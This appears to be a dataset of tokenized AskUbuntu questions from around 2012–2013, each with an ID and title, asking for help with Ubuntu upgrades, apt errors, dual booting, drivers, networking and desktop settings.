237572	can not update from version 10.10 to 11.4 because natty unavailable	i have the maverick release of ubuntu 10.10 and the only release that is suggested to me is natty 11.04 . but the files can not be retrieved from servers to install natty because as you can see here , they do n't exist anymore ... http : //extras.ubuntu.com/ubuntu/dists/ . ubuntu thus tells me i must have a connection problem because it can not find files . ( which is not the case ) . do you know if i can manually download , open and execute the files from another release ( oneiric for example ) ? thanks a lot in advance , pauline
237573	ubuntu `` 1 time password on login '' solution	i recently fully switched from windows into ubuntu . and of course i loved ubuntu . but the most annoying thing is , system requires password every single time you do something . is there any way to configure system so that , to enter the password only on logon screen . i mean 1 time you enter password and logon . then system must know that you 're his boss , and no need to ask every time for password . i do n't want to change any system file for this purpose , but if there is any legal way to do it , i 'd be very happy . thanks in advance for wasting your time and trying to help
237575	zoom in on small photos without losing pixel crispness	i 'm working on some pixel art but when i preview it in something like eye of gnome , the image gets blurry instead of showing crisp pixels . i know this sounds backwards , but how do i prevent that ? opening the file in gimp shows crisp pixels as expected but gimp is really big to just view photos quickly .
237576	no acceptable c compiler found in $ path	i want to install one package named speech_tools-2.1-release.tar.gz . after i run command ./configure in this package , it show me a message : configure : error : no acceptable c compiler found in $ path see 'config.log ' for more details what do i do ?
237578	what programs can i use to improve network performance ?	what programs are available to see the performance of my pc ? my internet seems to be loading very slow and i have a business internet connection . i ran the command lshw -c network and this is what i got : *-network description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 50:46:5d : ae:2b : cd width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.5.0-21-generic firmware=n/a ip=192.168.1.218 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 ioport : ee00 ( size=256 ) memory : fdefc000-fdefffff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 03 serial : 6c : f0:49 : e3:37 : f6 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168d-2.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:50 ioport : de00 ( size=256 ) memory : fd9ff000-fd9fffff memory : fd9f8000-fd9fbfff memory : fd900000-fd91ffff
237581	i run ubuntu 12.10 , i ca n't update anymore and i get this error message	i run ubuntu 12.10 . i ca n't update anymore because i get this error . e : malformed line 54 in source list /etc/apt/sources.list ( dist parse ) line 54 : deb http : //archive.canonical.com/ partner
237582	error during updating ubuntu 12.10	i installed ubuntu 12.10 using windows installer ( wubi ) . when i tried to update it using `` sudo apt-get update '' , it did n't work and showed something like this something wicked happened resolving 'archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //archive.ubuntu.com quantal/main i386 packages i 'm using a proxy network.i 'm a beginner.so , plz tell me what to do in detail .
237584	how to specify target architecture in quickly apps ?	i 'm building a quickly-app , do i have to specify somewhere the architecture ( amd64 , i386 , etc ) in which my app can run ? thanks in advance . regards .
237589	booting ubuntu12.10 usb on asus x401a win8	this is my first time replacing an os with linux . i want to replace windows with ubuntu 12.10 on my asus x401a . the laptop does not have an optical drive so i need to use a usb stick . i 've read all the topics i can find on the topic of installing on this particular machine to no avail . it seems that no one has a problem getting the usb stick to boot . i have written the iso to usb using startup disk creator , i disabled safe-boot , and fast-boot on the laptop but when i enter the bios and tell it to boot from usb ( uefi : cbm ) it still boots into windows 8 . i 've tried disabling all boot options except usb and it just boots right back into the bios . any help would be greatly appreciated as i bought this laptop specifically to run ubuntu .
237590	downloading files	i 'm about to download the program glances made at http : //nicolargo.github.com/glances/ to monitor my computer . it offers a .zip file and a .tar.gz file . which file type is more compatible with ubuntu ?
237594	web development in ubuntu	i can not seem to find info on creating web pages on my ubuntu 12.10 server . is there a program to do this like microsoft has ( such as frontpage ) ? i have installed ubuntu 12.10 , phpmyadmin , mysql , lamp server , postfix . now what should i do ?
237598	errors updating 11.10	these update errors are preventing upgrade ubuntu 11.04 . ( i want to ultimately upgrade to 12.04 ) : http : //extras.ubuntu.com/ubuntu/dists/natty/main/source/sources 404 not found http : //extras/ubuntu.com/ubuntu/dists/natty/main/binary-amd64/packages 404 not found http : //extras/ubuntu.com/ubuntu/dists/natty/main/binary-i386/packages 404 not found i check for updates pretty often but recently these have cropped up . i 'm learning as i go but need some assistance to resolve this . any guidance would be greatly appreciated .
237608	ca n't download qt5 from launchpad ppa with the following error	xml parsing error : undefined entity location : https : //launchpad.net/api/1.0/~ui-toolkit/+archive/ppa line number 14 , column 9 : < dd > < p > & nbsp ; ubuntu sdk preview for ubuntu application development < /p > < /dd >
237614	will existing ubuntu installation still work on this new hardware ?	i currently have the following cpu : model name : amd athlon ( tm ) ii x2 240e processor stepping : 2 microcode : 0x10000b7 cpu mhz : 2800.000 cache size : 1024 kb on the following mainboard : product : 785gt-e63 ( ms-7551 ) vendor : micro-star international co. , ltd i plan to get a new cpu intel i7 and a new corresponding mainboard but keep the ssd , graphic card and wireless card ? does anyone know if my existing ubuntu installation will still work on this new hardware ?
237615	running hdd protection	good day folks , i run ubuntu 12.04 l.t.s . on a toshiba satellite p845-s4200 i downloaded toshibaâs h.d.d . protection software and it wo n't run in wine ( wine tricks disappears ) left the menu bar tab to the left . how do i know if its running ? or how do i get it to run ? regards , g.k .
237617	debug qt application on ubuntu with root permission using qt creator	it is possible to run my application with root priviliges using sudo , like this : sudo ./myapp is it possible to debug my qt application using root priviliges using qtcreator ? how can i do this on an ubuntu system ?
237621	error occur when i setup the ip of bbb-conf for bigbluebutton	techalay @ ubuntu : ~ $ sudo bbb-conf -- setip 192.168.0.75 [ sudo ] password for techalay : assigning 192.168.0.75 for testing for firewall in /var/www/bigbluebutton/client/conf/config.xml assigning 192.168.0.75 for rtmp : // in /var/www/bigbluebutton/client/conf/config.xml assigning 192.168.0.75 for servername in /etc/nginx/sites-available/bigbluebutton assigning 192.168.0.75 for http : // in /var/www/bigbluebutton/client/conf/config.xml assigning 192.168.0.75 for web application url in /var/lib/tomcat6/webapps/bigbluebutton/web-inf/classes/bigbluebutton.properties assigning 192.168.0.75 for api demos in /var/lib/tomcat6/webapps/demo/bbb_api_conf.jsp assigning 192.168.0.75 for record and playback in /usr/local/bigbluebutton/core/scripts/slides.yml restarting the bigbluebutton server ... * stopping red5 server red5 [ ok ] * stopping tomcat servlet engine tomcat6 [ ok ] stopping nginx : nginx . killing : 4600 stopping openoffice headless server . record and playback monitoring stopped starting freeswitch error : stacksize -1 is too large : run ulimit -s 240 or run /opt/freeswitch/bin/freeswitch -waste . auto-adjusting stack size for optimal performance ... 5553 backgrounding . waiting for freeswitch to start : ... ... ... ... ... ... ... ... ... starting openoffice headless server starting nginx : the configuration file /etc/nginx/nginx.conf syntax is ok configuration file /etc/nginx/nginx.conf test is successful nginx . * starting red5 server red5 [ ok ] * starting tomcat servlet engine tomcat6 [ ok ] record and playback monitoring started waiting for bigbluebutton to finish starting up ( this may take a minute ) : .startup unsuccessful : could not connect to 192.168.0.75 bigbluebutton api
237622	accidentally removed default gnome panel applications	i accidentally removed the default gnome panel menu on the top right ( containing clock , mail , volume and shutdown options ) . after , i tried to get the menu back by adding some apps but that did not solve the problem . i then stumbled upon a reset via the terminal , however , the menu remains missing and the apps i added are still there . sudo dconf reset -f /org/gnome/gnome-panel/ killall gnome-panel and gconftool-2 -- recursive-unset /apps/panel pkill gnome-panel system : ubuntu 12.04 with gnome classic . any help is greatly appreciated ! many thanks in advance .
237634	ubuntu not booting after dual installing with windows xp sp2	i have 2 hard disk in my pc ( first one was divided into 3 logical drives c : \ , d : \ and e : \ and the secondary hard disk was divided into 2 logical drives g : \ and h : \ ) the former one was running windows xp installed in c drive with the fat32 file system for the former and the latter was in ntfs . i had some files in g : \ drive which i moved to h : \ drive before installing ubuntu desktop 12.04 lts through boot cd . the installation was done with part of g : \ drive ( with more than 300 gb ) was used as root ( / ) file system with about 10 gig and swap space of 6 gig . after the installation , ubuntu asked to reboot and also self ejected the disk from the tray . post reboot , the dual boot is not seen and the pc loads into windows xp sp2 and i can not see the g and h drive too . what could have gone wrong ? i followed a thread on how to install with windows xp and had cleared up the g : \ drive for that . are my files in h : \ drive gone ? using windows disk management tool i can still see the secondary hard drive as unallocated space together with the 500gig ( both g and h drive together ) . the boot cd is also not showing up properly ( shown as empty drive ) from windows xp now . how am i to recover the h drive and then install ubuntu properly ? ?
237642	ubuntu 12.10 - how to use gdb to debug a kernel module ?	i am trying to use gdb to view function calls of my wireless driver . my driver is ath5k . in my opinion , all things that i have to do is : using gdb to debug ath5k module . is it right ? anybody can give me a hint how to do this ?
237644	ubuntu does not load after installing it alongside windows	i installed ubuntu 12.04 and i chose to install 'alongside windows 7 ' . after installation and restart , windows 7 loaded but there is no sign that ubuntu is actually installed . windows 7 is installed in hdd0 , boots in legacy mode ( only 1 hd in machine ) , uefi secure boot is disabled . i do n't see anything on uefi boot . my partitions on my 1tb hdd : 100mb ntfs ( win 7 installtion made it automatically ) 200gb ntfs ( win 7 partition ) 4 gb partition ( idk what file sys ) rest all unallocated edit -- - yesterday i deleted the unused 4 gb partition current os is running on live usb fat 32 the result of fdisk -l is in the pic result of sudo parted -l
237645	just upgraded to 12.10 every time i restart , settings are lost	if i shut down and later turn on my computer , my wallpaper is back to the initial wallpaper and all of the programs i pin to launcher are gone , likewise the ones that i unpin are back . has anyone else had this problem ? i 've googled around but could n't quite find what i was looking for .
237647	hourly events in the firewall-log , originating from ubuntu12.04-box . how to find the reason ?	every hour , the logfile on our firewall ( ipcop 1.4.20 , 192.168.1.8 ) lists nine lines , apparently caused by my computer ( ubuntu 12.04 , 192.168.1.55 ) : jan 8 08:01:16 ipc9 kernel : new not syn ? in=eth0 out= mac=00:04:06:08:0b:03:00:0c:0e:05:07:01:01:00 src= 192.168.1.55 dst=192.168.1.8 len=40 tos=0x00 prec=0x00 ttl=64 id=36594 df proto=tcp spt=44474 dpt=800 win dow=37960 res=0x00 ack fin urgp=0 ... jan 8 08:02:08 ipc9 kernel : new not syn ? in=eth0 out= mac=00:04:06:08:0b:03:00:0c:0e:05:07:04:08:00 src= 192.168.1.55 dst=192.168.1.8 len=40 tos=0x00 prec=0x00 ttl=64 id=36602 df proto=tcp spt=44474 dpt=800 win dow=37960 res=0x00 ack fin urgp=0 i have no idea how to find the cause of these entries . /etc/cron.hourly is empty . root @ ubb-55 : ~ # netstat -tulpen aktive internetverbindungen ( nur server ) proto recv-q send-q local address foreign address state user inode pid/program name tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 0 8994 940/dnsmasq tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen 0 8042 685/sshd tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen 0 79057 777/cupsd tcp6 0 0 : ::22 : : : * listen 0 8044 685/sshd tcp6 0 0 : :1:631 : : : * listen 0 79056 777/cupsd udp 0 0 127.0.0.1:53 0.0.0.0 : * 0 8993 940/dnsmasq udp 0 0 0.0.0.0:68 0.0.0.0 : * 0 8612 910/dhclient root @ ubb-55 : ~ # how can one find out , which service or whatever is causing these packets every hour ? thanks , robert
237649	how do i install a program from a executable cd ?	now by executable cd i mean a disk that usually would run and install a program but for some reason is n't . i would particularly like to know how to install it from the command line ( terminal ) . please do help . the program on the cd is an .iso file . it is not a windows executable file it is an .iso file for the installation of the program matlab with the following contents : a x-install file a license text file a few octet-stream file some documentation ( .pdf ) some x-executable files plain text files icons
237653	unable to connect or manage networks in lubuntu 12.04 [ vmwareplayer ]	i 'm trying to connect to a vpn inside vmwareplayer running lubuntu 12.04 but i 'm not able to do it . this is my nm 's screen edit : ca n't post screenshot i ca n't change anything or connect to any interfaces via graphical interface . is it normal ? apart from command line , how can i change network settings via gui ? there are no vpn connections or other options , it shows just the details of the packets exchanged .
237657	i need help with the battery icon	i have a toshiba satellite l645d running ubuntu 12.10 and it seems like ubuntu like some other distros ( nadia , debian ) wo n't recognize my battery and i do n't know the reason for that , it wo n't show the level of charge and if i have my laptop plugged in with the ac adapter , i have tried this `` settings > power - show battery status in the menu bar '' as always but it wo n't show me the level of charge at any moment i think the whole os wo n't recognize the battery at all , help please , i 'm desperate because every time i 'm running the laptop with the battery eventually will discharge completely and turn off without even warning about battery level . i do n't want to go back to windows 7 and i have also asked this question in spanish forums ( as i 'm a spanish native talker ) but no one seems to know how to fix this problem .
237658	can somebody help fix ubuntu 12.04 being stuck at black screen on regular boot	i will give a run down of the events that led up to the issue first : i performed a clean install of ubuntu 12.04 i upgraded to the 3.7.1 kernel using the instructions provided by the second post in this link how to update kernel to the latest mainline version without any distro-upgrade ? i then got my wireless working using the instructions provided in this link http : //forums.opensuse.org/english/get-technical-help-here/wireless/477285-rtl8723ae-realtek-wirless-driver-hell-3.html # post2494079 i installed bumblebee as this is an optimus laptop with a gtx630m afterwards when i attempted a reboot it sat at the purple screen for about 10 seconds , then going to a back-lit black screen indefinitely . however , i can get into and run ubuntu if i hold shift on boot , select recovery mode , and then select boot normally . if i logout though , it gets stuck at what appears to be a pink screen . another note , when it is booted using nomodeset , it tells me that no discrete vga device is detected , and when i attempt to use optirun from terminal it also tells me that no discrete gpu is detected . if anybody could offer some assistance so that i could boot into ubuntu regularly without needing to go into recovery mode every time that would be extremely appreciated ! if you need any further information let me know and i 'll do whatever can be done to assist . : )
237659	low performance in ubuntu 12.10 : is there a problem ?	i have the following specifications : memory : 3 gb processor : intel® core™2 quad cpu q6600 @ 2.40ghz × 4 ( 32 bit ) available disk space : 271 gib kernel linux 3.5.0-17-generic gnome 3.6.0 i 'm running ubuntu 12.10 and it runs really slowly . is it a software or a hardware problem ? should i use a 12.04 or 11.10-04 instead to increase performance ?
237660	asterisk unable to install on ubuntu 12.04lts	i am having some difficulty installing asterisk on a 64bit server . i get the following error and cant seem to find help about this . failed to fetch http : //za.archive.ubuntu.com/ubuntu/pool/main/o/openais/libsaevt3_1.1.4-4_amd64.deb hash sum mismatch my steps : remove /var/lib/apt/lists/* remove /var/cache/apt/lists/partial ... failed file apt-get clean apt-get update outcome : failed next step : download the libsaevt.deb package and use dkpg -i to install package outcome : failed please help !
237664	transfer data from ubuntu desktop ( pc ) to ubuntu nexus 7 ( tablet ) without otg-cable or wifi	are there any ways to transfer data without wifi or cloud based services from my ubuntu desktop pc to my nexus 7 ( tablet ) which is running ubuntu and not android . or is there any other solution to this problem , besides using memory unit and otg-cable ? is there a way to mount the tablet when it is connected via cable ?
237665	remote assistance application	i goggled around a lot but i did n't find a proper answer to my question , so i 'm going to ask it here . i convinced my parents to switch to xubuntu and i would like to offer them remote assistance whenever they need . i also have an xubuntu box . which are the client / server applications that i need to install to perform remote assistance ? thanks !
237666	apt-get error : unable to find expected entry contrib/binary-i386/packages in meta-index file ( malformed release file ? )	i am getting below error when i try to update . i had gone through the previous articles related to this question but none of them were helpless . could you please help me to rectify this ? w : failed to fetch http : //archive.cloudera.com/cdh4/ubuntu/lucid/amd64/cdh/dists/lucid-cdh4/release unable to find expected entry contrib/binary-i386/packages in meta-index file ( malformed release file ? ) e : some index files failed to download , they have been ignored , or old ones used instead . the contents of /etc/apt/sources.list are cat /etc/apt/sources.list # ( deleted commented lines and deb-src ) deb in.archive.ubuntu.com/ubuntu lucid main restricted deb in.archive.ubuntu.com/ubuntu lucid-updates main restricted deb in.archive.ubuntu.com/ubuntu lucid universe multiverse deb in.archive.ubuntu.com/ubuntu lucid-updates multiverse regards , raj
237670	proprietary drivers do n't work with amd radeon hd 7640g on ubuntu 12.10	my setup first off , my apologies if this is a duplicate but i could not find anything specific regarding my graphics card . so as the title states , i have purchased a new laptop with an amd radeon hd 7640g graphics card . ( detailed specifications ) . i was able to install ubuntu on the laptop without any problems whatsoever . my next step was enabling the proprietary drivers ( catalyst 12.11 ) from the additional drivers menu ( jockey ) . that 's where i got stuck . the open source drivers do not appear to support the graphics card mode the problem after installing fglrx , my notebook now does n't boot up properly anymore . it displays the splash screen but then gets stuck in a shell . at this point i am not able to enter any commands so i 'm forced to do a hard reboot and get into recovery/low graphics mode . shown in this image below : i would love to make fglrx work . what i 've tried so far i followed the instructions provided by this q & a and the official ubuntu guide , but to no avail . both sources offer the same basic steps , which i think i took : get the latest catalyst driver from amd website ( catalyst 12.11 beta 8 ) , set the .run file to be able to execute ( chmod etc ) run it in terminal initialise the driver by : sudo amdconfig -- initial -f or sudo aticonfig -- initial -f reboot is there anything i 'm overlooking . any suggestion on what i might be doing wrong ? or is there maybe another way of installing fglrx ? i might not have provided enough details in this post . so if there 's any other information you need to help me with this problem , please let me know and i 'll be glad to add it . right so an update . i have managed to install the 12.10 driver from catalyst and when i reboot , i get the login screen etc . after i log in , it loads my desktop background , but it does not appear to load unity or anything else . literally just gets stuck on a desktop background . another update : following the 'answer ' marked below this , for both the catalyst 12.10 and 12.11 beta , the problems are still persistent : catalyst 12.10 it would appear that catalyst 12.10 is consistent and can get me as far as the log in window . after logging in i get the desktop background but nothing else . from here i was able to load terminal and run ps -ef | grep unity which confirms unity has not launched . catalyst 12.11 after attempting a few variations for installing this driver , it still passes the ubuntu splash screen and then fails to progress any further . shown in the image above . log files from xorg and sys ( assuming it 's ok to post links here from a file host ) if anyone would like to look at my log files to help you can get them from the links below : syslog : http : //www.mediafire.com/ ? fd76x66tao81etr xorg.0.log : http : //www.mediafire.com/ ? g07ycz6pteizbqi
237671	new kubuntu 12.10 on new hardware locking up	i have installed kubuntu 12.10 on a new computer . every few hours of work , the system locks up . the keyboard and mouse are unresponsive , and the screen does not change even if there exist on the screen elements that should change ( such as a countdown timer or the system clock ) . i can not use ctrl-alt-f* to get to a terminal . the hard drive light flickers briefly once every 10-15 seconds , this is a much slower pace then is observed when the system is functioning properly . the applications running at the time of lockup include : skype , rsibreak , zim , anki , firefox , konsole with an active ssh session , apache2 , mysqld , and of course kde . the issue has occurred with 2 different keyboards , but i have not tried a different mouse yet . as these are the tools needed for work , i can not simply run for a few hours with them disabled to see if any are the 'guilty party ' . the lockup occurs both while i am actively typing on something , or if i have stepped away for a few minutes . the following hardware is installed : gigabyte f2a55m-hd2 geforce 210 amd processor , 4 gib memory , 1 tb hard drive , 500w power supply more detailed hwinfo can be found here . i plan on running memtest overnight . what else should i check , and how might i get a log of the problem ? thank you . edit : the system just locked up again with only firefox , chrome , konsole and kde running . here is the syslog . thanks .
237673	how to connect to wireless network through terminal	i am a newbie to ubuntu 12.04.pls tell me how to connect to wireless network via terminal.i use a tata photon plus usb model . how do i know that my internet is connected ? ( from terminal ) i need to install , and update some packages.somehow i could n't do them through browser , because my system is running in low graphics.i need to fix a lot , for which i need to connect to internet .
237682	why do tray icons such as uget turn white when i open the dash ?	tray icons such as uget turn white when i open the dash . why is that ?
237685	why i ca n't install shutter ?	i want to install shutter , because i took a screenshot with the printscreen button , but when i try to install shutter from the software center or from the terminal using the shutter ppa , it says that i need to install libxml-simple-perl . when i try to install that , it throws me another dependency , then again , then again . why i ca n't install shutter ? even synaptic wo n't install it . is there any fix for it ? are there any alternatives for shutter ?
237694	headphones do n't work on dell studio xps 16 with ubuntu 12.10	i am running ubuntu 12.10 on a dell studio xps 16 and the headphone jack is n't working . the internal speakers work fine . i have tried a lot of suggestions from different posts , but none of them work .
237696	can apps created using quickly for ubuntu be used in other linux distros ?	i need to write a small program to update my mongodb . i 'm currently on ubuntu but i need to use it on other linux distributions . i would just like to make sure that applications using this method : http : //developer.ubuntu.com/get-started/ can be run on other distros ?
237697	how do i upload pictures to picasa using nautilus scripts ?	i 'm looking for a nautilis script to upload a picture to a picasa album using googlecl here is my script : zenity -- info -- title `` file '' -- text `` $ nautilus_script_selected_file_paths '' -- height 18 google picasa post `` fichiers transférés '' `` $ nautilus_script_selected_file_paths '' zenity -- info -- title `` return '' -- text `` return code : $ ? '' -- height 18 i get this error using ( nautilus -- no-desktop ) : loading file /home/victor/téléchargements/avatar.jpg to album fichiers transférés loading file to album fichiers transférés failed to upload . ( 601 : found , not path name or object with a .read ( ) method ) 1 photos failed to upload any idea to solve the problem ? i do n't understand the error : )
237698	ffmeg x264 presets not working	trying to capture screen to video file encoded with lossless x264 : vic @ vic-x202e ~/desktop » ffmpeg -f x11grab -r 15 -s 1366x768 -i :0.0 -sameq -vcodec libx264 -preset : v ultrafast test.mkv ffmpeg version 0.8.4-6:0.8.4-0ubuntu0.12.10.1 , copyright ( c ) 2000-2012 the libav developers built on nov 6 2012 16:51:11 with gcc 4.7.2 *** this program is deprecated *** this program is only provided for compatibility and will be removed in a future release . please use avconv instead . [ x11grab @ 0xc2bf60 ] device : :0.0 - > display : :0.0 x : 0 y : 0 width : 1366 height : 768 [ x11grab @ 0xc2bf60 ] shared memory extension found [ x11grab @ 0xc2bf60 ] estimating duration from bitrate , this may be inaccurate input # 0 , x11grab , from ':0.0 ' : duration : n/a , start : 1357648973.267658 , bitrate : 503562 kb/s stream # 0.0 : video : rawvideo , bgra , 1366x768 , 503562 kb/s , 15 tbr , 1000k tbn , 15 tbc unrecognized option 'preset : v' failed to set value 'ultrafast ' for option 'preset : v' another try : vic @ vic-x202e ~/desktop » ffmpeg -f x11grab -r 15 -s 1366x768 -i :0.0 -sameq -vcodec libx264 -preset ultrafast test.mkv ffmpeg version 0.8.4-6:0.8.4-0ubuntu0.12.10.1 , copyright ( c ) 2000-2012 the libav developers built on nov 6 2012 16:51:11 with gcc 4.7.2 *** this program is deprecated *** this program is only provided for compatibility and will be removed in a future release . please use avconv instead . [ x11grab @ 0x2482f60 ] device : :0.0 - > display : :0.0 x : 0 y : 0 width : 1366 height : 768 [ x11grab @ 0x2482f60 ] shared memory extension found [ x11grab @ 0x2482f60 ] estimating duration from bitrate , this may be inaccurate input # 0 , x11grab , from ':0.0 ' : duration : n/a , start : 1357648985.325860 , bitrate : 503562 kb/s stream # 0.0 : video : rawvideo , bgra , 1366x768 , 503562 kb/s , 15 tbr , 1000k tbn , 15 tbc unrecognized option 'preset' failed to set value 'ultrafast ' for option 'preset' vic @ vic-x202e ~/desktop » something broken ? using kubuntu 12.10 .
237702	lock down all programs besides web browser	i am building some kiosks , running ubuntu , that will host an intranet site . what is the best way to allow access only to an internet browser , and no other applications ?
237706	use volume and playback keys without waking the monitor ?	often my laptop is just standing around and just playing music and for the below mentioned actions i do n't need to see wat 's going on on my desktop . is it possible to use the volume and playback keys ( no fn keys ) of my keyboard to use volume up/down mute/unmute play/pause previous/next without waking the monitor/display of the laptop ?
237709	it is possible to use ssh shared connections and preventing getting them closed ?	if you ever used ssh shared connection you may also encounter the : shared connection to < hostname > closed . now , my question is if there is a way that would allow you to benefit from the speedup of using shared ssh connections that would not close your connection when the first ssh session is closed .
237713	is it possible to do an unattended/silent lamp installation ?	is there a way to set up and pre-configure a lamp environment within a bash script without user prompting by dpkg and present data like mysql or root user password and such kinds of things ?
237715	installed ubuntu and now ca n't boot into windows anymore	okay , now i have a new problem ... i installed ubuntu on my new ssd today . but now windows 8 does n't show up in the boot loader anymore . i ran boot repair and it told me gpt detected . please create a bios-boot partition ( > 1mb , unformatted filesystem , bios_grub flag ) . this can be performed via tools such as gparted . then try again . alternatively , you can retry after reactivating the [ separate /boot/efi partition : ] option . given that it seemed to be the easier option i tried activating the separate /boot/efi option but windows does not show up in my boot loader . even worse , when i try to boot from the windows ssd via my bios it gives me reboot and select proper boot device or insert boot media in selected boot device and press a key so currently i ca n't get into my windows installation which is my primary and most important drive . how can i fix this ? do i need to use gparted ? and if so , how exactly ? i downloaded the tool but i have no idea what to do here - and i certainly do n't want to destroy my windows installation !
237722	ubuntu for phone naming and branding	what 's the official name for referring to ubuntu running on a smartphone ? i 've heard it variously referred to as `` ubuntu '' , `` ubuntu phone '' , `` ubuntu phone os '' , `` ubuntu for phones '' and probably more . also , is the interface used on phones called `` unity '' , or is it called something else ?
237728	cairo dock shows a vertical line instead of showing a dock !	i just installed cairo-dock and was changing some settings . i tried to change the theme to mac os x , which i placed in ~/.config/cairo-dock/themes/mac os x/ after which my cairo dock does n't display at all . i have been using it in opengl mode , changing it to non-opengl does n't seem to help ( same problem ) . i have tried removing the package configs ( using ubuntu tweak ) and then reinstalled cairo-dock and cairo-dock-plug-ins , and restarted several times but still , when i start cairo-dock - same problem again . when i start cairo dock , this is what displays on my desktop ( instead of showing the dock ) . how can i make it work ? this is how my dock looks : notice the little line inside the red ellipse ? that 's the dock . no icons or anything . click also does n't work . this is what it shows when i run cairo-dock from terminal . i have removed bunch of gtk warnings before this verbose for simplicity . ( cairo-dock:6241 ) : gtk-warning ** : theme parsing error : nautilus.css:157:21 : not using units is deprecated . assuming 'px ' . ( cairo-dock:6241 ) : gtk-warning ** : theme parsing error : nautilus.css:173:20 : not using units is deprecated . assuming 'px ' . warning : ( /build/buildd/cairo-dock-3.1.2/src/gldit/cairo-dock-opengl.c : cairo_dock_initialize_opengl_backend:208 ) could n't find an appropriate visual , trying to get one without stencil buffer ( it may cause some little deterioration in the rendering ) ... ============================================================================ cairo-dock version : 3.1.2 compiled date : dec 2 2012 00:22:04 built with gtk : 3.6 running with opengl : 1 ============================================================================ g_key_file_set_string : assertion `string ! = null ' failed unity-bridge : registered as unity : < dbus.service.busname com.canonical.unity on < dbus._dbus.sessionbus ( session ) at 0x2323890 > at 0x2330c90 > connect ... - > connected to cairo-dock ( 'new owner : ' , dbus.utf8string ( ':1.190 ' ) ) warning : ( /build/buildd/cairo-dock-3.1.2/src/gldit/cairo-dock-surface-factory.c : cairo_dock_create_surface_from_image:440 ) this file ( /home/jared/.icons/leopard_icons_v0.3/extras/more/quicktimeplayer.png ) does n't exist or is not readable . note : i do n't know where that `` jared '' came from . thanks in advance !
237730	using broadcom bcm4313 as ap in ubuntu 12.04	i have a broadcom bcm4313 wireless card and i 'm interested in turning my laptop to an access point . i was following the various tutorials available on the internet to achieve this . however i seem to have hit a roadblock . while all other broadcom wireless cards seem to work , this particular card does not run with b43 driver . any idea how to get the ap working for this card ?
237732	ubuntu on the new sony z	about the new ubuntu for phones is it going to support the new android phones such as sony z that was reviewed in the there ces 2013
237735	touchegg not working 12.10 after multi-touch unity gestures disabled	i 've read the thread here how can i disable arbitrary default multitouch gestures in unity ? where people seem to have solved their problems with touchegg in 12.10 . as for me , i 'm able to install everything without errors but then when i bring up touchegg none of the gestures are recognized . two questions : do i need to get utouch installed ? it is not a recognized package for 12.10 . when i run dpkg-buildpackage i have to use sudo . could this affect the process ? should i get fakeroot ? p.s . i know my touchpad at least supports 3-finger gestures because i have used them with windows 8 .
237737	how to properly have a theme that is not completely dark but has dark menus in lubuntu 12.10 ?	i do not like full-dark themes in lubuntu , but i like dark menus . in lubuntu 12.04 was using one theme that was called mediteranean ligh if i remember well that was like that . a similar question got an answer that indicated a new ambiance theme with dark menus . ( at some point i used ambiance and clearlooks with dark menus , i think , but can not find them anymore . ) but after upgrading to 12.10 these themes with dark menus began displaying some incorrect white background under fonts on certain menus and buttons . like this , in the network settings : or on the buttons of synaptic while the main menus and most other menus were ok , dark , as supposed to be . this happens when i use my older darked-menus theme mediterraneanlight , or the theme recommended in the answer to the question mentioned ( ambianceoneiric-master ) . ( this question here is lubuntu-specific . therefore , please do not flag it as duplicate of others here that ask about having back the dark menus of the ambiance theme : all these questions have been closed as duplicate of this one , already mentioned , which is gnome/unity-specific , and the ambianceoneiric-master theme indicated as answer would not work in lubuntu 12.10 . ) what to do ?
237739	where can i find a driver for an epson xp-405 printer ?	is there a driver for an epson xp-405 printer ? i asked epson but they could not help .
237741	how to update dell laptop bios ?	an earlier link in askubuntu sheds some light on how to do this , but i found with my recently-purchased dell inspiron 7520 none of the published methods worked . i am therefore posting this to record my experience in the hope that others find it useful for bios upgrades on dell hardware post-2010 ( approximately ) , and maybe for other makes of computer as well . the approximate date of 2010 relates to the last active date of the unofficial dell support sites referred to in the above link , but in some cases the sell-by date on the web information may be as early as 2008 . first , it is important to have a good reason to mess around with the bios . in my case , i had an issue with the behaviour of certain usb devices using the usb3 ports . shortly after i purchased the machine , a bios upgrade was published by dell , which was said to address some issues with the usb3 ports . the bios upgrade was published by dell as a windows executable , so of course my question is how to run it on an ubuntu box which had been purged of all things microsoft . the methods referred to above mostly depend on being able to create a dos-like environment using freedos , or on using obsolete dell scripts to download and install header files . i found that running the .exe file under most forms of dos ( including freedos and ms-dos ) just produced a brief message saying 'test. ' . i found that the methods relying on dell scripts did not work , either due to obsolete code , or because of out-of-date repositories . so , how do we do this ?
237744	12.04 not detecting apple wireless keyboard	i 'm having some issues pairing an apple wireless keyboard with my asus laptop running 12.04 and win7 . it does not have native bluetooth , so i 'm using a generic rocketfish usb adapter . i did get it to the pin step , but mistyped and ended up cancelling . now , in the setup new devices , i notice that an entry flickers from time to time in the search box . but no entry ever shows up . what i 've done so far : sudo rfkill list shows that hci0 : bluetooth is not hard or soft blocked sudo hcitool dev prints out hci0 00:02:76:2e:5d:4f i installed the linux-firmware-nonfree package batteries are not an issue , keyboard works when booted in win7 during the search process , when i turn on the keyboard , the keyboard light stays lit for ~4 seconds or so and then goes out . any other solutions ?
237745	can not connect using smartbro in ubuntu 12.10	i have just installed ubuntu 12.10 and in order to access the internet , i used my smart bro - model mf180 ( plug and play usb stick ) but i ca n't connect to the internet . are there some modifications or commands that i have to do to enable it ?
